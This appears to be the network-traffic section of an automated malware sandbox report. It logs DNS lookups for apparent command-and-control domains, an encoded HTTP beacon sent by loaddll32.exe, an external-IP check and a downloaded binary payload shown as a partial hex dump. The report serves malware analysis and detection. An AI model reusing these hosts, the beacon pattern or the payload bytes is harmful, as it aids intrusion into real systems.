                                                          Oct 7, 2021 01:32:22.114604950 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.127623081 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.127691984 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.127741098 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.127789974 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.127811909 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.127839088 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.127845049 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.127895117 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.127947092 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.127949953 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.127995014 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.128043890 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.128082991 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.128094912 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.128143072 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.128156900 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.128191948 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.128240108 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.128248930 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.128297091 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.128354073 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.163994074 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.164031982 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.164170980 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.178225994 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.178261042 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.178278923 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.178303003 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.178327084 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.178349018 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.178380013 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.178400040 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.178453922 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.178463936 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.178479910 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.178499937 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.178519011 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.178595066 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.178658009 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.178682089 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.178704977 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.178724051 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.178746939 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.178774118 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.178824902 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.178849936 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.213804007 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.213840008 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.213970900 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.229209900 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.229269981 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.229315042 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.229357004 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.229382992 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.229397058 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.229409933 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.229439974 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.229489088 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.229533911 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.229537010 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.229543924 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.229577065 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.229619980 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.229639053 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.229717970 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.229758978 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.229787111 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.229799986 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.229845047 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.229846954 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.229890108 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.229979992 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.263015032 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.263047934 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.263174057 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.306135893 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.306200981 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.306248903 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.306298971 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.306351900 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.306359053 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.306385040 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.306397915 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.306446075 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:23.063931942 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:23.113169909 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:23.620450020 CEST4978180192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:23.669929981 CEST8049781194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:23.670125008 CEST4978180192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:23.671128988 CEST4978180192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:23.764269114 CEST8049781194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:24.126127005 CEST8049781194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:24.173518896 CEST4978180192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:24.507015944 CEST8049781194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:24.507299900 CEST4978180192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:24.507493019 CEST4978180192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:24.556721926 CEST8049781194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:34:00.783740044 CEST4986280192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:34:00.833882093 CEST8049862194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:34:00.834063053 CEST4986280192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:34:00.834180117 CEST4986280192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:34:00.927697897 CEST8049862194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:34:01.322679043 CEST8049862194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:34:01.322864056 CEST4986280192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:34:01.322945118 CEST4986280192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:34:01.371798038 CEST8049862194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:34:10.072343111 CEST4986380192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:34:10.121365070 CEST8049863194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:34:10.121700048 CEST4986380192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:34:10.121752024 CEST4986380192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:34:10.121759892 CEST4986380192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:34:10.170469999 CEST8049863194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:34:10.640894890 CEST8049863194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:34:10.641083002 CEST4986380192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:34:10.641149044 CEST4986380192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:34:10.690242052 CEST8049863194.147.86.221192.168.2.4

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 7, 2021 01:32:17.880515099 CEST4971453192.168.2.48.8.8.8
                                                          Oct 7, 2021 01:32:18.173275948 CEST53497148.8.8.8192.168.2.4
                                                          Oct 7, 2021 01:32:18.824342966 CEST5802853192.168.2.48.8.8.8
                                                          Oct 7, 2021 01:32:18.980140924 CEST5309753192.168.2.48.8.8.8
                                                          Oct 7, 2021 01:32:19.161839008 CEST53580288.8.8.8192.168.2.4
                                                          Oct 7, 2021 01:32:19.289130926 CEST53530978.8.8.8192.168.2.4
                                                          Oct 7, 2021 01:32:20.480238914 CEST4925753192.168.2.48.8.8.8
                                                          Oct 7, 2021 01:32:20.772708893 CEST53492578.8.8.8192.168.2.4
                                                          Oct 7, 2021 01:32:20.812315941 CEST6238953192.168.2.48.8.8.8
                                                          Oct 7, 2021 01:32:20.830039024 CEST53623898.8.8.8192.168.2.4
                                                          Oct 7, 2021 01:32:23.312601089 CEST4991053192.168.2.48.8.8.8
                                                          Oct 7, 2021 01:32:23.618545055 CEST53499108.8.8.8192.168.2.4
                                                          Oct 7, 2021 01:33:24.333306074 CEST6407853192.168.2.48.8.8.8
                                                          Oct 7, 2021 01:33:24.352554083 CEST53640788.8.8.8192.168.2.4
                                                          Oct 7, 2021 01:33:24.362245083 CEST6407953192.168.2.4208.67.222.222
                                                          Oct 7, 2021 01:33:24.379193068 CEST5364079208.67.222.222192.168.2.4
                                                          Oct 7, 2021 01:33:24.381411076 CEST6408053192.168.2.4208.67.222.222
                                                          Oct 7, 2021 01:33:24.399873972 CEST5364080208.67.222.222192.168.2.4
                                                          Oct 7, 2021 01:33:24.429609060 CEST6408153192.168.2.4208.67.222.222
                                                          Oct 7, 2021 01:33:24.448523998 CEST5364081208.67.222.222192.168.2.4
                                                          Oct 7, 2021 01:34:00.486257076 CEST5125553192.168.2.48.8.8.8
                                                          Oct 7, 2021 01:34:00.780658960 CEST53512558.8.8.8192.168.2.4
                                                          Oct 7, 2021 01:34:09.717750072 CEST6152253192.168.2.48.8.8.8
                                                          Oct 7, 2021 01:34:10.070925951 CEST53615228.8.8.8192.168.2.4

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                          Oct 7, 2021 01:32:17.880515099 CEST192.168.2.48.8.8.80x2a0eStandard query (0)init.icecreambob.comA (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:32:18.824342966 CEST192.168.2.48.8.8.80x4731Standard query (0)init.icecreambob.comA (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:32:18.980140924 CEST192.168.2.48.8.8.80xa7a5Standard query (0)init.icecreambob.comA (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:32:20.480238914 CEST192.168.2.48.8.8.80x46cbStandard query (0)init.icecreambob.comA (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:32:20.812315941 CEST192.168.2.48.8.8.80x2650Standard query (0)init.icecreambob.comA (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:32:23.312601089 CEST192.168.2.48.8.8.80x5791Standard query (0)init.icecreambob.comA (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:33:24.333306074 CEST192.168.2.48.8.8.80xb091Standard query (0)resolver1.opendns.comA (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:33:24.362245083 CEST192.168.2.4208.67.222.2220x1Standard query (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                          Oct 7, 2021 01:33:24.381411076 CEST192.168.2.4208.67.222.2220x2Standard query (0)myip.opendns.comA (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:33:24.429609060 CEST192.168.2.4208.67.222.2220x3Standard query (0)myip.opendns.com28IN (0x0001)
                                                          Oct 7, 2021 01:34:00.486257076 CEST192.168.2.48.8.8.80x70a8Standard query (0)art.microsoftsofymicrosoftsoft.atA (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:34:09.717750072 CEST192.168.2.48.8.8.80x75bStandard query (0)art.microsoftsofymicrosoftsoft.atA (IP address)IN (0x0001)

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                          Oct 7, 2021 01:32:18.173275948 CEST8.8.8.8192.168.2.40x2a0eNo error (0)init.icecreambob.com194.147.86.221A (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:32:19.161839008 CEST8.8.8.8192.168.2.40x4731No error (0)init.icecreambob.com194.147.86.221A (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:32:19.289130926 CEST8.8.8.8192.168.2.40xa7a5No error (0)init.icecreambob.com194.147.86.221A (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:32:20.772708893 CEST8.8.8.8192.168.2.40x46cbNo error (0)init.icecreambob.com194.147.86.221A (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:32:20.830039024 CEST8.8.8.8192.168.2.40x2650No error (0)init.icecreambob.com194.147.86.221A (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:32:23.618545055 CEST8.8.8.8192.168.2.40x5791No error (0)init.icecreambob.com194.147.86.221A (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:33:24.352554083 CEST8.8.8.8192.168.2.40xb091No error (0)resolver1.opendns.com208.67.222.222A (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:33:24.379193068 CEST208.67.222.222192.168.2.40x1No error (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                          Oct 7, 2021 01:33:24.379193068 CEST208.67.222.222192.168.2.40x1No error (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                          Oct 7, 2021 01:33:24.379193068 CEST208.67.222.222192.168.2.40x1No error (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                          Oct 7, 2021 01:33:24.399873972 CEST208.67.222.222192.168.2.40x2No error (0)myip.opendns.com102.129.143.57A (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:34:00.780658960 CEST8.8.8.8192.168.2.40x70a8No error (0)art.microsoftsofymicrosoftsoft.at194.147.86.221A (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:34:10.070925951 CEST8.8.8.8192.168.2.40x75bNo error (0)art.microsoftsofymicrosoftsoft.at194.147.86.221A (IP address)IN (0x0001)

                                                          HTTP Request Dependency Graph

                                                          • init.icecreambob.com
                                                          • art.microsoftsofymicrosoftsoft.at

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.449776194.147.86.22180C:\Windows\System32\loaddll32.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 7, 2021 01:32:18.233037949 CEST1596OUTGET /HKPpcwlwrfQkTmv8P06H/3Wxv_2FnSDQGUBdPXw9/RYY8q690tWMw7_2FqiZKDR/tihJyHYSdUWc_/2Bk0Blz4/Ugw940qxXbfuHBW4kjFJy7m/qeLyDgVQe2/v1ANC_2B2jNzm_2B0/UCUkcrNLM1Qj/GKGs5Yns4a1/y2RcxBlEBBMDgc/vui4nnWlDWEvxcnjXpxFk/PDKIsTs7GBXCyaSr/TwT_2BF1pJMPI8c/ynG0YGZIeokgeQwjHf/KZMBUT4_2/BvirsVJDlpOpDnwD83YS/kQDSJlsGXWqTNVyxDqs/KuldZQ_2BlbTtmbV3TyeLX/ai8Q6i HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                                          Host: init.icecreambob.com
                                                          Oct 7, 2021 01:32:18.712804079 CEST1597INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 06 Oct 2021 23:32:18 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 194704
                                                          Connection: close
                                                          Pragma: public
                                                          Accept-Ranges: bytes
                                                          Expires: 0
                                                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                          Content-Disposition: inline; filename="615e3202a5f19.bin"
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                          X-Content-Type-Options: nosniff
                                                          Data Raw: 94 88 7c 25 28 17 00 c4 63 f0 06 1c 3b e8 95 8b ba be e6 78 80 40 2e e8 92 09 78 d3 be bf 0b c7 98 ce 6c 02 f6 4f 2e dc a2 6d 17 4b 99 a2 72 cd dd 48 40 a0 0b 9a b0 3a 13 31 02 61 ed b5 a2 45 3d ba c7 d3 54 37 ae 50 dc 54 cd e7 31 c8 4e e2 86 81 0f a8 fa cf 3d af 72 64 2b cd 53 7d f5 d8 85 3a 44 bf 3e 5e 42 6e c2 f2 01 42 39 1a d0 bd e1 e9 4f cf 0d 6f 1a 5c a4 1f 4d 9e 53 3e f8 8a 9d cb 39 8d c1 3e 52 69 02 36 3a 44 9d 07 e7 3f 42 be ec ef f3 98 15 c8 c5 96 9b ca 42 8f be 41 63 c7 58 d6 bf 48 8e 37 c9 0e 31 a5 ad 55 88 7f 1f 4d 43 36 cd b2 3b 1d a7 b0 9f 1b 4e 5c 65 cc 08 e7 c8 bb 20 d4 9b d3 71 46 b3 b8 ea 19 bf a8 f9 86 4c 1c c9 50 f2 97 52 05 e3 9f e2 25 ba 6b 79 9c 28 a0 88 a8 7d 98 8e 17 05 15 9b 76 e3 5d 62 bd 23 46 7d 36 b2 2b eb 02 f7 49 61 7a b7 10 12 10 45 37 23 db 1e 93 72 f1 d6 e1 16 db e1 e9 73 7f 36 32 66 95 83 c8 6e c4 95 7f 2f 57 99 17 97 83 9d 5f 8d 11 be 55 1f be 0c 6b 62 5c 8e 1d 82 68 e5 24 0a d8 de b4 d1 05 43 97 7e aa 01 75 71 59 f3 bf b5 d5 f1 22 de 50 ae 78 af a3 3b ea d2 9d cd 20 b2 6c 68 02 cd 8e 8e 51 47 35 a7 5f c7 6d cf f1 34 be 2f 32 1b c7 26 4a a8 9b 71 d5 cc 17 09 71 c6 48 13 49 03 5a 6c 17 f9 84 e7 ac 7a 57 d3 a3 e9 62 46 b9 48 98 0b 48 15 4f d5 46 84 85 04 c2 4a 78 8b 9a a2 82 9b 2f ae f9 94 9d 58 12 50 de a6 9b 3f 4b 5c 47 3c 89 3f 88 90 6f 86 cc 7b b7 2c cc 35 1a 93 cd 47 d9 5f c9 47 52 d7 ad 08 58 e1 3c 18 0e 57 57 ad 86 75 dc 57 21 e5 d1 ed b8 3c 0b f5 dc 12 32 51 d3 fa 26 66 da 8f 2e 6f 6c d5 43 99 bb 4b cd dd 54 88 32 84 fe 8f 85 3e f8 c8 17 96 1d c5 9a f0 69 19 ea 45 d7 cd 04 cd 6e 2f a7 d0 0c 60 9b 0a 6d 1b 7b 10 2c 53 49 2d 30 d6 e4 d8 bb 37 76 98 f2 6b 69 eb 4b ae 30 ee 00 bb 11 5c a4 3b e7 c1 b1 24 42 71 14 e5 1e 7f 8e 28 9e 3d c1 9e 14 9b 12 ea d7 93 56 67 ea 7c 39 f5 e2 b9 b9 ff fe 69 fc ef ac 34 41 bf 08 66 e5 4c 55 0d f0 f2 fa 78 90 ba 34 ff a6 b8 b8 03 61 e3 b2 67 63 aa 38 1d b9 7f 96 f6 7a 58 2e 4c 2b 63 59 e6 6a 79 54 5b d5 2f 60 29 49 fd ec 82 4d 61 bf a5 e6 c3 94 cf d5 1c 92 a5 8b d9 e9 3b b0 63 96 87 b3 84 24 9b 07 2b 43 5f 80 26 bc 42 6b 06 5b 19 d6 4c 11 48 9d 39 ea fa 0f 64 ee eb 8b a7 e2 4c 37 3c 0b c7 86 77 eb f8 29 da 5a 8f 41 e2 7b d4 dc 06 46 06 07 90 95 42 13 3f 3e a1 ee 2c 2f 5e 72 95 3f f2 09 e8 3e 9f 6e a6 61 99 b8 02 37 06 9a 3f 66 24 9b be aa 4e eb fd 55 db da 85 6d ed e3 6c 76 2a be 75 34 7d 58 83 2b 1e 8e 5a 11 83 fe 95 24 24 cb a1 07 54 a2 0e 30 bf cb 7c 9b 69 8a d8 2e 91 74 d6 02 d2 af 1c a7 bb 62 76 23 4c f7 72 f2 83 01 f7 5a 5c 06 4f 1c 6f 6f 4c 5e eb 94 20 2f ba 65 96 0e 8f 0d 93 4b 30 04 4c 2e 13 97 a2 93 4e dd 4d 35 97 fc eb ec 3e 45 d3 36 0a 36 2f 8f d6 d3 49 fa 77 2e 82 45 51 d3 c2 bc f0 41 93 36 eb a3 09 65 31 62 82 66 34 31 ce 34 99 99 f3 0c 1a e2 26 f6 f3 f8 df 7e b3 85 2e 58 88 8c d0 69 33 c3 dd ce 14 92 1b 8e 6f 0e 5a 90 fc
                                                          Data Ascii: |%(c;x@.xlO.mKrH@:1aE=T7PT1N=rd+S}:D>^BnB9Oo\MS>9>Ri6:D?BBAcXH71UMC6;N\e qFLPR%ky(}v]b#F}6+IazE7#rs62fn/W_Ukb\h$C~uqY"Px; lhQG5_m4/2&JqqHIZlzWbFHHOFJx/XP?K\G<?o{,5G_GRX<WWuW!<2Q&f.olCKT2>iEn/`m{,SI-07vkiK0\;$Bq(=Vg|9i4AfLUx4agc8zX.L+cYjyT[/`)IMa;c$+C_&Bk[LH9dL7<w)ZA{FB?>,/^r?>na7?f$NUmlv*u4}X+Z$$T0|i.tbv#LrZ\OooL^ /eK0L.NM5>E66/Iw.EQA6e1bf414&~.Xi3oZ
                                                          Oct 7, 2021 01:32:18.712869883 CEST1599INData Raw: bb 74 00 07 b2 53 48 2b df 48 20 15 1b 25 9a 6b 3d 39 33 46 15 c6 7f 39 4a 6b 31 a8 c6 5b 3d 4b bd f4 ee 5a 70 9e 0b 7f c4 eb 11 34 d4 9d be 62 ef 69 1c 35 2c ae db c5 89 21 81 67 5c fe d2 b6 53 8b 8e 0b e2 50 ce 84 15 8e c3 b9 d4 6f 38 a3 7b 85
                                                          Data Ascii: tSH+H %k=93F9Jk1[=KZp4bi5,!g\SPo8{up}w#"6ZxP%i{:{?u+SnXXk3zhz=+~3Kl=~@qZ:xF6;!fEZ\<FmnJ!:9Rq
                                                          Oct 7, 2021 01:32:18.712912083 CEST1600INData Raw: 45 8c c3 5f c8 f0 ef 84 51 2e 1e 97 72 76 0a ba 21 c6 92 d8 54 08 41 3b e0 7a f4 47 1f bc dc fa 9b a0 66 de 38 7d 71 f8 a0 e3 73 b9 f7 80 80 aa d4 7c 91 17 19 80 d1 b7 34 ae 80 85 bb ff 0d 43 a2 ad 6c 9b c3 7d ad 25 3e fc 49 4b 45 8b 24 9f c2 34
                                                          Data Ascii: E_Q.rv!TA;zGf8}qs|4Cl}%>IKE$4QdCxy*^qZ9c!WfMx]|*ivxNQQgEbY]Y_v2'NHG3E=5ZCxo}^2}77j`YePI&`s0
                                                          Oct 7, 2021 01:32:18.712949038 CEST1602INData Raw: bf ff 9b 51 fb c7 53 ce d6 a3 ff 29 fe fd e7 23 a3 f6 fc 32 2d 9e 44 84 20 1e a0 44 0a 99 fd 65 58 64 8e b1 2b 3d 51 a6 35 29 7f 4e 09 44 74 ed 6d 4b d8 3a 22 a2 0d b9 38 b3 fb ad 55 99 a3 4b e1 28 0b be 85 86 7e b4 57 48 fa 2b b0 3d 65 8f 37 b8
                                                          Data Ascii: QS)#2-D DeXd+=Q5)NDtmK:"8UK(~WH+=e7'd+kmk8CNy0BV?PY]r]PHMMFu`_1+v%zu+QGCEq]WClmN`?R"aFX$=O4v0=cMhNNJF~r9
                                                          Oct 7, 2021 01:32:18.712989092 CEST1603INData Raw: 4e 6b 3c 42 ba 15 91 a5 1e 9b c1 00 1c cc 9d 63 da e9 55 4f 6b 47 d5 b5 59 8d cf 44 ff af a3 5b 09 5b 23 e0 da 0e 4c b9 b8 4b b9 5f be 0f 2b df 19 ea b3 17 f8 86 56 2d b6 bc 9d 8f b6 8e 28 b4 d6 09 88 a5 e1 93 dc 97 7e 41 1c 6b 30 6a e6 ff ed 25
                                                          Data Ascii: Nk<BcUOkGYD[[#LK_+V-(~Ak0j%Z^A<!H;e:+Uv&[6<u^aO`*\lEv*WcD>B\[c6j,C.z^R}C9L@cif~LS[CDdYB,v`)s?^'
                                                          Oct 7, 2021 01:32:18.713027000 CEST1604INData Raw: 80 9d 44 25 2e d3 89 85 b1 48 7d b0 6b db 1f b9 6f 88 47 31 13 e0 8f 0a ca f9 75 2f 97 63 84 9f 79 92 b5 63 68 c6 45 44 d8 8a d2 5e e6 0c 0f e0 df d5 9f e7 5a 34 b0 56 4c a8 34 f7 58 e9 aa b1 f8 08 78 bb 56 d7 6e d8 11 73 c0 cf f6 87 ea 7f db a0
                                                          Data Ascii: D%.H}koG1u/cychED^Z4VL4XxVnsiFqlkqaAOkVIu{$pL-`NG\9YU{D)pPZR\}6X@l%;J"v5?S`b28$S8O gsBBlfd "
                                                          Oct 7, 2021 01:32:18.713063002 CEST1606INData Raw: 6d da a3 6c be 82 e2 72 8b 8b c5 8d 31 41 bb 56 58 56 73 a9 9a b9 b0 1d 3f 49 ef 0f 29 80 87 7b f2 33 69 a7 44 37 eb a4 ee 4c 22 cf 25 8d 09 5b 2a b5 e4 f4 3d ee d9 ec 24 41 90 a7 07 37 11 e1 65 df c4 af 48 f6 a6 cf 26 26 c0 eb b8 46 d6 03 a7 ac
                                                          Data Ascii: mlr1AVXVs?I){3iD7L"%[*=$A7eH&&Fun%-UR!0f76-"_(4Fo\~v;)1YbN)BL8`iqn50&@L{2P=n:#4b$;C
                                                          Oct 7, 2021 01:32:18.713100910 CEST1607INData Raw: e5 78 5f 9f 99 d7 b9 59 7c 00 4a e4 ae 4f bc 9e 22 78 f2 46 f0 7f 1d fe de 31 97 36 bf 93 35 0e 31 15 b0 30 25 9a 25 52 e2 b7 39 cf dd 0c 04 07 16 d3 e9 a2 73 b1 90 b4 6b 8d e2 2f ef 02 da 6c 29 91 df 06 99 4b 75 c9 45 1d 85 b3 bd 63 db af c5 ff
                                                          Data Ascii: x_Y|JO"xF16510%%R9sk/l)KuEcN#[aQM$rFAT_7FRYQf8bErj?rzb'ICq8O{F%N^u,,C>7=Xr7J_5NzP@
                                                          Oct 7, 2021 01:32:18.713139057 CEST1608INData Raw: 55 85 3f 60 f1 a6 c3 6d 62 f9 6d 8a 01 75 c2 a7 63 1b c7 9f 0e 3f d4 da 01 2e 5e 60 c9 ef a0 06 16 6d 2d 2a 1c 0d 0f ec 03 03 8f 0f 82 7a 22 1b 29 8f f8 bb d7 7f dc 6f 03 6d 76 41 84 7b da 41 8d 28 75 be 0c 76 b5 d6 cb 48 a6 44 5b bb 8c 6c 09 b4
                                                          Data Ascii: U?`mbmuc?.^`m-*z")omvA{A(uvHD[lr@<Y,rc5_-tu{&l+hcUn|g:Xm@2zvWG_;&zPv*St.`^_65a ,k|
                                                          Oct 7, 2021 01:32:18.713187933 CEST1610INData Raw: 90 ea 95 5e 8e 8d ab 92 13 f3 99 50 12 90 a6 a8 b4 c6 d9 98 92 a0 f3 f4 19 b1 b4 2d 76 19 41 e3 31 30 16 1a 6f c4 d4 41 de 0e 8c e5 92 b8 7c 64 93 1b 2f 20 dd 03 99 a5 7b 24 e8 42 3f 18 79 c7 c9 d9 a4 41 17 eb 1d a0 44 39 ad 85 e6 93 39 84 67 9c
